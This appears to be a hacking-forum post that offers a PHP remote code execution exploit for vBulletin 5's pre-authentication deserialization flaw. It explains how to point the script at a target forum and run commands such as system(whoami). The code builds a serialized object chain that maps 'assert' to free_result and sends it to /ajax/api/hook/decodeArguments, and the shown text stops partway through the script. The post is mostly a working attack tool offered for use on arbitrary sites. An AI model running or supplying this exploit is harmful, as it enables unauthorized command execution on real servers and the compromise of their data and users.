VB 5 preauth RCE Remote code execution exploit

VB 5 preauth RCE Remote code execution exploit Pranaam to all _/_ this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz) script is developed by someone else just type target forum link and in command box type whatever command you want to execute, syntax is system(your_command); like ls so type system(ls); if you want to execute whoami command type system(whoami); Enjoy source code is //////////code starts <?php /* Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman */ if (isset($_POST[target])) { $host = $_POST[target]; $path = /ajax/api/hook/decodeArguments?arguments=; class vB_Database { public $functions = array(); public function __construct() { $this->functions[free_result] = assert; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { if(isset($_POST[command])) { $command = $_POST[command]; } else if (isset($_POST[sh...